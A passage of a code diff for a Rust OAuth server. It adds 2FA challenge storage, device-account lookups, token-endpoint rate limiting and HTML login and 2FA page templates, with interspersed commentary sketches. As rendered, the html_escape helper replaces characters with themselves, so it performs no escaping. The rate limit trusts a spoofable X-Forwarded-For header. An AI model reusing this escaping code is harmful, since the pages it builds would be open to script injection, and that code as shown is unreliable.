+
) -> Result<bool, OAuthError> {
141
+
let row = sqlx::query!(
142
+
r#"
143
+
SELECT 1 as exists
144
+
FROM oauth_account_device ad
145
+
JOIN users u ON u.did = ad.did
146
+
WHERE ad.device_id = $1
147
+
AND ad.did = $2
148
+
AND u.deactivated_at IS NULL
149
+
AND u.takedown_ref IS NULL
150
+
"#,
151
+
device_id,
152
+
did
153
+
)
154
+
.fetch_optional(pool)
155
+
.await?;
156
+
157
+
Ok(row.is_some())
158
+
}
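A sketch of how these queries are presumably consumed by the OAuth account picker, combining `get_device_accounts` with the templates added in this change. The handler shape is an assumption, and masking the email via `mask_email` before it reaches HTML is an assumption about intended use (the helper is exported from templates):

use crate::oauth::templates::{account_selector_page, mask_email, DeviceAccount};

async fn render_account_picker(
    pool: &sqlx::PgPool,
    device_id: &str,
    client_id: &str,
    request_uri: &str,
) -> Result<String, crate::oauth::OAuthError> {
    let rows = get_device_accounts(pool, device_id).await?;
    let accounts: Vec<DeviceAccount> = rows
        .into_iter()
        .map(|r| DeviceAccount {
            did: r.did,
            handle: r.handle,
            email: mask_email(&r.email),
            last_used_at: r.last_used_at,
        })
        .collect();
    Ok(account_selector_page(client_id, None, request_uri, &accounts))
}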
+8
-1
src/oauth/db/mod.rs
+8
-1
src/oauth/db/mod.rs
···
4
mod helpers;
5
mod request;
6
mod token;
7
8
pub use client::{get_authorized_client, upsert_authorized_client};
9
pub use device::{
10
-
create_device, delete_device, get_device, update_device_last_seen, upsert_account_device,
11
};
12
pub use dpop::{check_and_record_dpop_jti, cleanup_expired_dpop_jtis};
13
pub use request::{
···
20
delete_token, delete_token_family, enforce_token_limit_for_user, get_token_by_id,
21
get_token_by_refresh_token, list_tokens_for_user, rotate_token,
22
};
···
4
mod helpers;
5
mod request;
6
mod token;
7
+
mod two_factor;
8
9
pub use client::{get_authorized_client, upsert_authorized_client};
10
pub use device::{
11
+
create_device, delete_device, get_device, get_device_accounts, update_device_last_seen,
12
+
upsert_account_device, verify_account_on_device, DeviceAccountRow,
13
};
14
pub use dpop::{check_and_record_dpop_jti, cleanup_expired_dpop_jtis};
15
pub use request::{
···
22
delete_token, delete_token_family, enforce_token_limit_for_user, get_token_by_id,
23
get_token_by_refresh_token, list_tokens_for_user, rotate_token,
24
};
25
+
pub use two_factor::{
26
+
check_user_2fa_enabled, cleanup_expired_2fa_challenges, create_2fa_challenge,
27
+
delete_2fa_challenge, delete_2fa_challenge_by_request_uri, generate_2fa_code,
28
+
get_2fa_challenge, increment_2fa_attempts, TwoFactorChallenge,
29
+
};
+153
src/oauth/db/two_factor.rs
+153
src/oauth/db/two_factor.rs
···
···
1
+
use chrono::{DateTime, Duration, Utc};
2
+
use rand::Rng;
3
+
use sqlx::PgPool;
4
+
use uuid::Uuid;
5
+
6
+
use super::super::OAuthError;
7
+
8
+
pub struct TwoFactorChallenge {
9
+
pub id: Uuid,
10
+
pub did: String,
11
+
pub request_uri: String,
12
+
pub code: String,
13
+
pub attempts: i32,
14
+
pub created_at: DateTime<Utc>,
15
+
pub expires_at: DateTime<Utc>,
16
+
}
17
+
18
+
pub fn generate_2fa_code() -> String {
19
+
let mut rng = rand::thread_rng();
20
+
let code: u32 = rng.gen_range(0..1_000_000);
21
+
format!("{:06}", code)
22
+
}
23
+
24
+
pub async fn create_2fa_challenge(
25
+
pool: &PgPool,
26
+
did: &str,
27
+
request_uri: &str,
28
+
) -> Result<TwoFactorChallenge, OAuthError> {
29
+
let code = generate_2fa_code();
30
+
let expires_at = Utc::now() + Duration::minutes(10);
31
+
32
+
let row = sqlx::query!(
33
+
r#"
34
+
INSERT INTO oauth_2fa_challenge (did, request_uri, code, expires_at)
35
+
VALUES ($1, $2, $3, $4)
36
+
RETURNING id, did, request_uri, code, attempts, created_at, expires_at
37
+
"#,
38
+
did,
39
+
request_uri,
40
+
code,
41
+
expires_at,
42
+
)
43
+
.fetch_one(pool)
44
+
.await?;
45
+
46
+
Ok(TwoFactorChallenge {
47
+
id: row.id,
48
+
did: row.did,
49
+
request_uri: row.request_uri,
50
+
code: row.code,
51
+
attempts: row.attempts,
52
+
created_at: row.created_at,
53
+
expires_at: row.expires_at,
54
+
})
55
+
}
56
+
57
+
pub async fn get_2fa_challenge(
58
+
pool: &PgPool,
59
+
request_uri: &str,
60
+
) -> Result<Option<TwoFactorChallenge>, OAuthError> {
61
+
let row = sqlx::query!(
62
+
r#"
63
+
SELECT id, did, request_uri, code, attempts, created_at, expires_at
64
+
FROM oauth_2fa_challenge
65
+
WHERE request_uri = $1
66
+
"#,
67
+
request_uri
68
+
)
69
+
.fetch_optional(pool)
70
+
.await?;
71
+
72
+
Ok(row.map(|r| TwoFactorChallenge {
73
+
id: r.id,
74
+
did: r.did,
75
+
request_uri: r.request_uri,
76
+
code: r.code,
77
+
attempts: r.attempts,
78
+
created_at: r.created_at,
79
+
expires_at: r.expires_at,
80
+
}))
81
+
}
82
+
83
+
pub async fn increment_2fa_attempts(pool: &PgPool, id: Uuid) -> Result<i32, OAuthError> {
84
+
let row = sqlx::query!(
85
+
r#"
86
+
UPDATE oauth_2fa_challenge
87
+
SET attempts = attempts + 1
88
+
WHERE id = $1
89
+
RETURNING attempts
90
+
"#,
91
+
id
92
+
)
93
+
.fetch_one(pool)
94
+
.await?;
95
+
96
+
Ok(row.attempts)
97
+
}
98
+
99
+
pub async fn delete_2fa_challenge(pool: &PgPool, id: Uuid) -> Result<(), OAuthError> {
100
+
sqlx::query!(
101
+
r#"
102
+
DELETE FROM oauth_2fa_challenge WHERE id = $1
103
+
"#,
104
+
id
105
+
)
106
+
.execute(pool)
107
+
.await?;
108
+
109
+
Ok(())
110
+
}
111
+
112
+
pub async fn delete_2fa_challenge_by_request_uri(
113
+
pool: &PgPool,
114
+
request_uri: &str,
115
+
) -> Result<(), OAuthError> {
116
+
sqlx::query!(
117
+
r#"
118
+
DELETE FROM oauth_2fa_challenge WHERE request_uri = $1
119
+
"#,
120
+
request_uri
121
+
)
122
+
.execute(pool)
123
+
.await?;
124
+
125
+
Ok(())
126
+
}
127
+
128
+
pub async fn cleanup_expired_2fa_challenges(pool: &PgPool) -> Result<u64, OAuthError> {
129
+
let result = sqlx::query!(
130
+
r#"
131
+
DELETE FROM oauth_2fa_challenge WHERE expires_at < NOW()
132
+
"#
133
+
)
134
+
.execute(pool)
135
+
.await?;
136
+
137
+
Ok(result.rows_affected())
138
+
}
139
+
140
+
pub async fn check_user_2fa_enabled(pool: &PgPool, did: &str) -> Result<bool, OAuthError> {
141
+
let row = sqlx::query!(
142
+
r#"
143
+
SELECT two_factor_enabled
144
+
FROM users
145
+
WHERE did = $1
146
+
"#,
147
+
did
148
+
)
149
+
.fetch_optional(pool)
150
+
.await?;
151
+
152
+
Ok(row.map(|r| r.two_factor_enabled).unwrap_or(false))
153
+
}
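These helpers cover creation, lookup, attempt counting and cleanup; the verification step itself is left to the caller. A sketch of that step under an assumed attempt cap of 5 (the function name and cap are not part of this change):

pub async fn verify_2fa_code(
    pool: &PgPool,
    request_uri: &str,
    submitted: &str,
) -> Result<bool, OAuthError> {
    let Some(challenge) = get_2fa_challenge(pool, request_uri).await? else {
        return Ok(false);
    };
    // Expired or brute-forced challenges are consumed rather than retried.
    if challenge.expires_at < Utc::now() || challenge.attempts >= 5 {
        delete_2fa_challenge(pool, challenge.id).await?;
        return Ok(false);
    }
    if challenge.code != submitted {
        increment_2fa_attempts(pool, challenge.id).await?;
        return Ok(false);
    }
    // Success: the challenge is single-use.
    delete_2fa_challenge(pool, challenge.id).await?;
    Ok(true)
}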
+1
-1
src/oauth/endpoints/token/grants.rs
+1
-1
src/oauth/endpoints/token/grants.rs
+24
src/oauth/endpoints/token/mod.rs
+24
src/oauth/endpoints/token/mod.rs
···
19
};
20
pub use types::{TokenRequest, TokenResponse};
21
22
pub async fn token_endpoint(
23
State(state): State<AppState>,
24
headers: HeaderMap,
25
Form(request): Form<TokenRequest>,
26
) -> Result<(HeaderMap, Json<TokenResponse>), OAuthError> {
27
let dpop_proof = headers
28
.get("DPoP")
29
.and_then(|v| v.to_str().ok())
···
19
};
20
pub use types::{TokenRequest, TokenResponse};
21
22
+
fn extract_client_ip(headers: &HeaderMap) -> String {
23
+
if let Some(forwarded) = headers.get("x-forwarded-for") {
24
+
if let Ok(value) = forwarded.to_str() {
25
+
if let Some(first_ip) = value.split(',').next() {
26
+
return first_ip.trim().to_string();
27
+
}
28
+
}
29
+
}
30
+
if let Some(real_ip) = headers.get("x-real-ip") {
31
+
if let Ok(value) = real_ip.to_str() {
32
+
return value.trim().to_string();
33
+
}
34
+
}
35
+
"unknown".to_string()
36
+
}
37
+
38
pub async fn token_endpoint(
39
State(state): State<AppState>,
40
headers: HeaderMap,
41
Form(request): Form<TokenRequest>,
42
) -> Result<(HeaderMap, Json<TokenResponse>), OAuthError> {
43
+
let client_ip = extract_client_ip(&headers);
44
+
if state.rate_limiters.oauth_token.check_key(&client_ip).is_err() {
45
+
tracing::warn!(ip = %client_ip, "OAuth token rate limit exceeded");
46
+
return Err(OAuthError::InvalidRequest(
47
+
"Too many requests. Please try again later.".to_string(),
48
+
));
49
+
}
50
+
51
let dpop_proof = headers
52
.get("DPoP")
53
.and_then(|v| v.to_str().ok())
+2
src/oauth/mod.rs
+2
src/oauth/mod.rs
···
5
pub mod client;
6
pub mod endpoints;
7
pub mod error;
8
+
pub mod templates;
9
pub mod verify;
10
11
pub use types::*;
12
pub use error::OAuthError;
13
pub use verify::{verify_oauth_access_token, generate_dpop_nonce, VerifyResult, OAuthUser, OAuthAuthError};
14
+
pub use templates::{DeviceAccount, mask_email};
+719
src/oauth/templates.rs
+719
src/oauth/templates.rs
···
···
1
+
use chrono::{DateTime, Utc};
2
+
3
+
fn base_styles() -> &'static str {
4
+
r#"
5
+
:root {
6
+
--primary: #0085ff;
7
+
--primary-hover: #0077e6;
8
+
--primary-contrast: #ffffff;
9
+
--primary-100: #dbeafe;
10
+
--primary-400: #60a5fa;
11
+
--primary-600-30: rgba(37, 99, 235, 0.3);
12
+
--contrast-0: #ffffff;
13
+
--contrast-25: #f8f9fa;
14
+
--contrast-50: #f1f3f5;
15
+
--contrast-100: #e9ecef;
16
+
--contrast-200: #dee2e6;
17
+
--contrast-300: #ced4da;
18
+
--contrast-400: #adb5bd;
19
+
--contrast-500: #6b7280;
20
+
--contrast-600: #4b5563;
21
+
--contrast-700: #374151;
22
+
--contrast-800: #1f2937;
23
+
--contrast-900: #111827;
24
+
--error: #dc2626;
25
+
--error-bg: #fef2f2;
26
+
--success: #059669;
27
+
--success-bg: #ecfdf5;
28
+
}
29
+
30
+
@media (prefers-color-scheme: dark) {
31
+
:root {
32
+
--contrast-0: #111827;
33
+
--contrast-25: #1f2937;
34
+
--contrast-50: #374151;
35
+
--contrast-100: #4b5563;
36
+
--contrast-200: #6b7280;
37
+
--contrast-300: #9ca3af;
38
+
--contrast-400: #d1d5db;
39
+
--contrast-500: #e5e7eb;
40
+
--contrast-600: #f3f4f6;
41
+
--contrast-700: #f9fafb;
42
+
--contrast-800: #ffffff;
43
+
--contrast-900: #ffffff;
44
+
--error-bg: #451a1a;
45
+
--success-bg: #064e3b;
46
+
}
47
+
}
48
+
49
+
* {
50
+
box-sizing: border-box;
51
+
margin: 0;
52
+
padding: 0;
53
+
}
54
+
55
+
body {
56
+
font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif;
57
+
background: var(--contrast-50);
58
+
color: var(--contrast-900);
59
+
min-height: 100vh;
60
+
display: flex;
61
+
align-items: center;
62
+
justify-content: center;
63
+
padding: 1rem;
64
+
line-height: 1.5;
65
+
}
66
+
67
+
.container {
68
+
width: 100%;
69
+
max-width: 400px;
70
+
padding-top: 15vh;
71
+
}
72
+
73
+
@media (max-width: 640px) {
74
+
.container {
75
+
padding-top: 2rem;
76
+
}
77
+
}
78
+
79
+
.card {
80
+
background: var(--contrast-0);
81
+
border: 1px solid var(--contrast-100);
82
+
border-radius: 0.75rem;
83
+
padding: 1.5rem;
84
+
box-shadow: 0 20px 25px -5px rgba(0, 0, 0, 0.1), 0 8px 10px -6px rgba(0, 0, 0, 0.1);
85
+
}
86
+
87
+
@media (prefers-color-scheme: dark) {
88
+
.card {
89
+
box-shadow: 0 20px 25px -5px rgba(0, 0, 0, 0.4), 0 8px 10px -6px rgba(0, 0, 0, 0.3);
90
+
}
91
+
}
92
+
93
+
h1 {
94
+
font-size: 1.5rem;
95
+
font-weight: 600;
96
+
color: var(--contrast-900);
97
+
margin-bottom: 0.5rem;
98
+
}
99
+
100
+
.subtitle {
101
+
color: var(--contrast-500);
102
+
font-size: 0.875rem;
103
+
margin-bottom: 1.5rem;
104
+
}
105
+
106
+
.subtitle strong {
107
+
color: var(--contrast-700);
108
+
}
109
+
110
+
.client-info {
111
+
background: var(--contrast-25);
112
+
border-radius: 0.5rem;
113
+
padding: 1rem;
114
+
margin-bottom: 1.5rem;
115
+
}
116
+
117
+
.client-info .client-name {
118
+
font-weight: 500;
119
+
color: var(--contrast-900);
120
+
display: block;
121
+
margin-bottom: 0.25rem;
122
+
}
123
+
124
+
.client-info .scope {
125
+
color: var(--contrast-500);
126
+
font-size: 0.875rem;
127
+
}
128
+
129
+
.error-banner {
130
+
background: var(--error-bg);
131
+
color: var(--error);
132
+
border-radius: 0.5rem;
133
+
padding: 0.75rem 1rem;
134
+
margin-bottom: 1rem;
135
+
font-size: 0.875rem;
136
+
}
137
+
138
+
.form-group {
139
+
margin-bottom: 1.25rem;
140
+
}
141
+
142
+
label {
143
+
display: block;
144
+
font-size: 0.875rem;
145
+
font-weight: 500;
146
+
color: var(--contrast-700);
147
+
margin-bottom: 0.375rem;
148
+
}
149
+
150
+
input[type="text"],
151
+
input[type="email"],
152
+
input[type="password"] {
153
+
width: 100%;
154
+
padding: 0.625rem 0.875rem;
155
+
border: 2px solid var(--contrast-200);
156
+
border-radius: 0.375rem;
157
+
font-size: 1rem;
158
+
color: var(--contrast-900);
159
+
background: var(--contrast-0);
160
+
transition: border-color 0.15s, box-shadow 0.15s;
161
+
}
162
+
163
+
input[type="text"]:focus,
164
+
input[type="email"]:focus,
165
+
input[type="password"]:focus {
166
+
outline: none;
167
+
border-color: var(--primary);
168
+
box-shadow: 0 0 0 3px var(--primary-600-30);
169
+
}
170
+
171
+
input[type="text"]::placeholder,
172
+
input[type="email"]::placeholder,
173
+
input[type="password"]::placeholder {
174
+
color: var(--contrast-400);
175
+
}
176
+
177
+
.checkbox-group {
178
+
display: flex;
179
+
align-items: center;
180
+
gap: 0.5rem;
181
+
margin-bottom: 1.5rem;
182
+
}
183
+
184
+
.checkbox-group input[type="checkbox"] {
185
+
width: 1.125rem;
186
+
height: 1.125rem;
187
+
accent-color: var(--primary);
188
+
}
189
+
190
+
.checkbox-group label {
191
+
margin-bottom: 0;
192
+
font-weight: normal;
193
+
color: var(--contrast-600);
194
+
cursor: pointer;
195
+
}
196
+
197
+
.buttons {
198
+
display: flex;
199
+
gap: 0.75rem;
200
+
}
201
+
202
+
.btn {
203
+
flex: 1;
204
+
padding: 0.625rem 1.25rem;
205
+
border-radius: 0.375rem;
206
+
font-size: 1rem;
207
+
font-weight: 500;
208
+
cursor: pointer;
209
+
transition: background-color 0.15s, transform 0.1s;
210
+
border: none;
211
+
text-align: center;
212
+
text-decoration: none;
213
+
display: inline-flex;
214
+
align-items: center;
215
+
justify-content: center;
216
+
}
217
+
218
+
.btn:active {
219
+
transform: scale(0.98);
220
+
}
221
+
222
+
.btn-primary {
223
+
background: var(--primary);
224
+
color: var(--primary-contrast);
225
+
}
226
+
227
+
.btn-primary:hover {
228
+
background: var(--primary-hover);
229
+
}
230
+
231
+
.btn-primary:disabled {
232
+
background: var(--primary-400);
233
+
cursor: not-allowed;
234
+
}
235
+
236
+
.btn-secondary {
237
+
background: var(--contrast-500);
238
+
color: white;
239
+
}
240
+
241
+
.btn-secondary:hover {
242
+
background: var(--contrast-600);
243
+
}
244
+
245
+
.footer {
246
+
text-align: center;
247
+
margin-top: 1.5rem;
248
+
font-size: 0.75rem;
249
+
color: var(--contrast-400);
250
+
}
251
+
252
+
.accounts {
253
+
display: flex;
254
+
flex-direction: column;
255
+
gap: 0.5rem;
256
+
margin-bottom: 1rem;
257
+
}
258
+
259
+
.account-item {
260
+
display: flex;
261
+
align-items: center;
262
+
gap: 0.75rem;
263
+
width: 100%;
264
+
padding: 0.75rem;
265
+
background: var(--contrast-25);
266
+
border: 1px solid var(--contrast-100);
267
+
border-radius: 0.5rem;
268
+
cursor: pointer;
269
+
transition: background-color 0.15s, border-color 0.15s;
270
+
text-align: left;
271
+
}
272
+
273
+
.account-item:hover {
274
+
background: var(--contrast-50);
275
+
border-color: var(--contrast-200);
276
+
}
277
+
278
+
.avatar {
279
+
width: 2.5rem;
280
+
height: 2.5rem;
281
+
border-radius: 50%;
282
+
background: var(--primary);
283
+
color: var(--primary-contrast);
284
+
display: flex;
285
+
align-items: center;
286
+
justify-content: center;
287
+
font-weight: 600;
288
+
font-size: 0.875rem;
289
+
flex-shrink: 0;
290
+
}
291
+
292
+
.account-info {
293
+
flex: 1;
294
+
min-width: 0;
295
+
}
296
+
297
+
.account-info .handle {
298
+
display: block;
299
+
font-weight: 500;
300
+
color: var(--contrast-900);
301
+
overflow: hidden;
302
+
text-overflow: ellipsis;
303
+
white-space: nowrap;
304
+
}
305
+
306
+
.account-info .email {
307
+
display: block;
308
+
font-size: 0.875rem;
309
+
color: var(--contrast-500);
310
+
overflow: hidden;
311
+
text-overflow: ellipsis;
312
+
white-space: nowrap;
313
+
}
314
+
315
+
.chevron {
316
+
color: var(--contrast-400);
317
+
font-size: 1.25rem;
318
+
flex-shrink: 0;
319
+
}
320
+
321
+
.divider {
322
+
height: 1px;
323
+
background: var(--contrast-100);
324
+
margin: 1rem 0;
325
+
}
326
+
327
+
.link-button {
328
+
background: none;
329
+
border: none;
330
+
color: var(--primary);
331
+
cursor: pointer;
332
+
font-size: inherit;
333
+
padding: 0;
334
+
text-decoration: underline;
335
+
}
336
+
337
+
.link-button:hover {
338
+
color: var(--primary-hover);
339
+
}
340
+
341
+
.new-account-link {
342
+
display: block;
343
+
text-align: center;
344
+
color: var(--primary);
345
+
text-decoration: none;
346
+
font-size: 0.875rem;
347
+
}
348
+
349
+
.new-account-link:hover {
350
+
text-decoration: underline;
351
+
}
352
+
353
+
.help-text {
354
+
text-align: center;
355
+
margin-top: 1rem;
356
+
font-size: 0.875rem;
357
+
color: var(--contrast-500);
358
+
}
359
+
360
+
.icon {
361
+
font-size: 3rem;
362
+
margin-bottom: 1rem;
363
+
}
364
+
365
+
.error-code {
366
+
background: var(--error-bg);
367
+
color: var(--error);
368
+
padding: 0.5rem 1rem;
369
+
border-radius: 0.375rem;
370
+
font-family: monospace;
371
+
display: inline-block;
372
+
margin-bottom: 1rem;
373
+
}
374
+
375
+
.success-icon {
376
+
width: 3rem;
377
+
height: 3rem;
378
+
border-radius: 50%;
379
+
background: var(--success-bg);
380
+
color: var(--success);
381
+
display: flex;
382
+
align-items: center;
383
+
justify-content: center;
384
+
font-size: 1.5rem;
385
+
margin: 0 auto 1rem;
386
+
}
387
+
388
+
.text-center {
389
+
text-align: center;
390
+
}
391
+
392
+
.code-input {
393
+
letter-spacing: 0.5em;
394
+
text-align: center;
395
+
font-size: 1.5rem;
396
+
font-family: monospace;
397
+
}
398
+
"#
399
+
}
400
+
401
+
pub fn login_page(
402
+
client_id: &str,
403
+
client_name: Option<&str>,
404
+
scope: Option<&str>,
405
+
request_uri: &str,
406
+
error_message: Option<&str>,
407
+
login_hint: Option<&str>,
408
+
) -> String {
409
+
let client_display = client_name.unwrap_or(client_id);
410
+
let scope_display = scope.unwrap_or("access your account");
411
+
412
+
let error_html = error_message
413
+
.map(|msg| format!(r#"<div class="error-banner">{}</div>"#, html_escape(msg)))
414
+
.unwrap_or_default();
415
+
416
+
let login_hint_value = login_hint.unwrap_or("");
417
+
418
+
format!(
419
+
r#"<!DOCTYPE html>
420
+
<html lang="en">
421
+
<head>
422
+
<meta charset="UTF-8">
423
+
<meta name="viewport" content="width=device-width, initial-scale=1.0">
424
+
<meta name="robots" content="noindex">
425
+
<title>Sign in</title>
426
+
<style>{styles}</style>
427
+
</head>
428
+
<body>
429
+
<div class="container">
430
+
<div class="card">
431
+
<h1>Sign in</h1>
432
+
<p class="subtitle">to continue to <strong>{client_display}</strong></p>
433
+
434
+
<div class="client-info">
435
+
<span class="client-name">{client_display}</span>
436
+
<span class="scope">wants to {scope_display}</span>
437
+
</div>
438
+
439
+
{error_html}
440
+
441
+
<form method="POST" action="/oauth/authorize">
442
+
<input type="hidden" name="request_uri" value="{request_uri}">
443
+
444
+
<div class="form-group">
445
+
<label for="username">Handle or Email</label>
446
+
<input type="text" id="username" name="username" value="{login_hint_value}"
447
+
required autocomplete="username" autofocus
448
+
placeholder="you@example.com">
449
+
</div>
450
+
451
+
<div class="form-group">
452
+
<label for="password">Password</label>
453
+
<input type="password" id="password" name="password" required
454
+
autocomplete="current-password" placeholder="Enter your password">
455
+
</div>
456
+
457
+
<div class="checkbox-group">
458
+
<input type="checkbox" id="remember_device" name="remember_device" value="true">
459
+
<label for="remember_device">Remember this device</label>
460
+
</div>
461
+
462
+
<div class="buttons">
463
+
<button type="submit" formaction="/oauth/authorize/deny" class="btn btn-secondary">Cancel</button>
464
+
<button type="submit" class="btn btn-primary">Sign in</button>
465
+
</div>
466
+
</form>
467
+
468
+
<div class="footer">
469
+
By signing in, you agree to share your account information with this application.
470
+
</div>
471
+
</div>
472
+
</div>
473
+
</body>
474
+
</html>"#,
475
+
styles = base_styles(),
476
+
client_display = html_escape(client_display),
477
+
scope_display = html_escape(scope_display),
478
+
request_uri = html_escape(request_uri),
479
+
error_html = error_html,
480
+
login_hint_value = html_escape(login_hint_value),
481
+
)
482
+
}
483
+
484
+
pub struct DeviceAccount {
485
+
pub did: String,
486
+
pub handle: String,
487
+
pub email: String,
488
+
pub last_used_at: DateTime<Utc>,
489
+
}
490
+
491
+
pub fn account_selector_page(
492
+
client_id: &str,
493
+
client_name: Option<&str>,
494
+
request_uri: &str,
495
+
accounts: &[DeviceAccount],
496
+
) -> String {
497
+
let client_display = client_name.unwrap_or(client_id);
498
+
499
+
let accounts_html: String = accounts
500
+
.iter()
501
+
.map(|account| {
502
+
let initials = get_initials(&account.handle);
503
+
format!(
504
+
r#"<form method="POST" action="/oauth/authorize/select" style="margin:0">
505
+
<input type="hidden" name="request_uri" value="{request_uri}">
506
+
<input type="hidden" name="did" value="{did}">
507
+
<button type="submit" class="account-item">
508
+
<div class="avatar">{initials}</div>
509
+
<div class="account-info">
510
+
<span class="handle">@{handle}</span>
511
+
<span class="email">{email}</span>
512
+
</div>
513
+
<span class="chevron">›</span>
514
+
</button>
515
+
</form>"#,
516
+
request_uri = html_escape(request_uri),
517
+
did = html_escape(&account.did),
518
+
initials = html_escape(&initials),
519
+
handle = html_escape(&account.handle),
520
+
email = html_escape(&account.email),
521
+
)
522
+
})
523
+
.collect();
524
+
525
+
format!(
526
+
r#"<!DOCTYPE html>
527
+
<html lang="en">
528
+
<head>
529
+
<meta charset="UTF-8">
530
+
<meta name="viewport" content="width=device-width, initial-scale=1.0">
531
+
<meta name="robots" content="noindex">
532
+
<title>Choose an account</title>
533
+
<style>{styles}</style>
534
+
</head>
535
+
<body>
536
+
<div class="container">
537
+
<div class="card">
538
+
<h1>Choose an account</h1>
539
+
<p class="subtitle">to continue to <strong>{client_display}</strong></p>
540
+
541
+
<div class="accounts">
542
+
{accounts_html}
543
+
</div>
544
+
545
+
<div class="divider"></div>
546
+
547
+
<a href="/oauth/authorize?request_uri={request_uri_encoded}&new_account=true" class="new-account-link">
548
+
Sign in with another account
549
+
</a>
550
+
</div>
551
+
</div>
552
+
</body>
553
+
</html>"#,
554
+
styles = base_styles(),
555
+
client_display = html_escape(client_display),
556
+
accounts_html = accounts_html,
557
+
request_uri_encoded = urlencoding::encode(request_uri),
558
+
)
559
+
}
560
+
561
+
pub fn two_factor_page(
562
+
request_uri: &str,
563
+
channel: &str,
564
+
error_message: Option<&str>,
565
+
) -> String {
566
+
let error_html = error_message
567
+
.map(|msg| format!(r#"<div class="error-banner">{}</div>"#, html_escape(msg)))
568
+
.unwrap_or_default();
569
+
570
+
let (title, subtitle) = match channel {
571
+
"email" => ("Check your email", "We sent a verification code to your email"),
572
+
"Discord" => ("Check Discord", "We sent a verification code to your Discord"),
573
+
"Telegram" => ("Check Telegram", "We sent a verification code to your Telegram"),
574
+
"Signal" => ("Check Signal", "We sent a verification code to your Signal"),
575
+
_ => ("Check your messages", "We sent you a verification code"),
576
+
};
577
+
578
+
format!(
579
+
r#"<!DOCTYPE html>
580
+
<html lang="en">
581
+
<head>
582
+
<meta charset="UTF-8">
583
+
<meta name="viewport" content="width=device-width, initial-scale=1.0">
584
+
<meta name="robots" content="noindex">
585
+
<title>Verify your identity</title>
586
+
<style>{styles}</style>
587
+
</head>
588
+
<body>
589
+
<div class="container">
590
+
<div class="card">
591
+
<h1>{title}</h1>
592
+
<p class="subtitle">{subtitle}</p>
593
+
594
+
{error_html}
595
+
596
+
<form method="POST" action="/oauth/authorize/2fa">
597
+
<input type="hidden" name="request_uri" value="{request_uri}">
598
+
599
+
<div class="form-group">
600
+
<label for="code">Verification code</label>
601
+
<input type="text" id="code" name="code" class="code-input"
602
+
placeholder="000000"
603
+
pattern="[0-9]{{6}}" maxlength="6"
604
+
inputmode="numeric" autocomplete="one-time-code"
605
+
autofocus required>
606
+
</div>
607
+
608
+
<button type="submit" class="btn btn-primary" style="width:100%">Verify</button>
609
+
</form>
610
+
611
+
<p class="help-text">
612
+
Code expires in 10 minutes.
613
+
</p>
614
+
</div>
615
+
</div>
616
+
</body>
617
+
</html>"#,
618
+
styles = base_styles(),
619
+
title = title,
620
+
subtitle = subtitle,
621
+
request_uri = html_escape(request_uri),
622
+
error_html = error_html,
623
+
)
624
+
}
625
+
626
+
pub fn error_page(error: &str, error_description: Option<&str>) -> String {
627
+
let description = error_description.unwrap_or("An error occurred during the authorization process.");
628
+
629
+
format!(
630
+
r#"<!DOCTYPE html>
631
+
<html lang="en">
632
+
<head>
633
+
<meta charset="UTF-8">
634
+
<meta name="viewport" content="width=device-width, initial-scale=1.0">
635
+
<meta name="robots" content="noindex">
636
+
<title>Authorization Error</title>
637
+
<style>{styles}</style>
638
+
</head>
639
+
<body>
640
+
<div class="container">
641
+
<div class="card text-center">
642
+
<div class="icon">⚠️</div>
643
+
<h1>Authorization Failed</h1>
644
+
<div class="error-code">{error}</div>
645
+
<p class="subtitle" style="margin-bottom:0">{description}</p>
646
+
<div style="margin-top:1.5rem">
647
+
<button onclick="window.close()" class="btn btn-secondary">Close this window</button>
648
+
</div>
649
+
</div>
650
+
</div>
651
+
</body>
652
+
</html>"#,
653
+
styles = base_styles(),
654
+
error = html_escape(error),
655
+
description = html_escape(description),
656
+
)
657
+
}
658
+
659
+
pub fn success_page(client_name: Option<&str>) -> String {
660
+
let client_display = client_name.unwrap_or("The application");
661
+
662
+
format!(
663
+
r#"<!DOCTYPE html>
664
+
<html lang="en">
665
+
<head>
666
+
<meta charset="UTF-8">
667
+
<meta name="viewport" content="width=device-width, initial-scale=1.0">
668
+
<meta name="robots" content="noindex">
669
+
<title>Authorization Successful</title>
670
+
<style>{styles}</style>
671
+
</head>
672
+
<body>
673
+
<div class="container">
674
+
<div class="card text-center">
675
+
<div class="success-icon">✓</div>
676
+
<h1 style="color:var(--success)">Authorization Successful</h1>
677
+
<p class="subtitle">{client_display} has been granted access to your account.</p>
678
+
<p class="help-text">You can close this window and return to the application.</p>
679
+
</div>
680
+
</div>
681
+
</body>
682
+
</html>"#,
683
+
styles = base_styles(),
684
+
client_display = html_escape(client_display),
685
+
)
686
+
}
687
+
688
+
fn html_escape(s: &str) -> String {
689
+
s.replace('&', "&")
690
+
.replace('<', "<")
691
+
.replace('>', ">")
692
+
.replace('"', """)
693
+
.replace('\'', "'")
694
+
}
695
+
696
+
fn get_initials(handle: &str) -> String {
697
+
let clean = handle.trim_start_matches('@');
698
+
if clean.is_empty() {
699
+
return "?".to_string();
700
+
}
701
+
clean.chars().next().unwrap_or('?').to_uppercase().to_string()
702
+
}
703
+
704
+
pub fn mask_email(email: &str) -> String {
705
+
if let Some(at_pos) = email.find('@') {
706
+
let local = &email[..at_pos];
707
+
let domain = &email[at_pos..];
708
+
709
+
if local.len() <= 2 {
710
+
format!("{}***{}", local.chars().next().unwrap_or('*'), domain)
711
+
} else {
712
+
let first = local.chars().next().unwrap_or('*');
713
+
let last = local.chars().last().unwrap_or('*');
714
+
format!("{}***{}{}", first, last, domain)
715
+
}
716
+
} else {
717
+
"***".to_string()
718
+
}
719
+
}
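`mask_email` has a few small edge cases (short local parts, strings without an '@'); a quick test sketch against the implementation above:

#[cfg(test)]
mod mask_email_tests {
    use super::*;

    #[test]
    fn masks_local_part_but_keeps_domain() {
        assert_eq!(mask_email("alice@example.com"), "a***e@example.com");
        assert_eq!(mask_email("ab@example.com"), "a***@example.com");
        assert_eq!(mask_email("not-an-email"), "***");
    }
}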
+158
src/plc/mod.rs
+158
src/plc/mod.rs
···
319
Ok(())
320
}
321
322
+
pub struct PlcValidationContext {
323
+
pub server_rotation_key: String,
324
+
pub expected_signing_key: String,
325
+
pub expected_handle: String,
326
+
pub expected_pds_endpoint: String,
327
+
}
328
+
329
+
pub fn validate_plc_operation_for_submission(
330
+
op: &Value,
331
+
ctx: &PlcValidationContext,
332
+
) -> Result<(), PlcError> {
333
+
validate_plc_operation(op)?;
334
+
335
+
let obj = op.as_object()
336
+
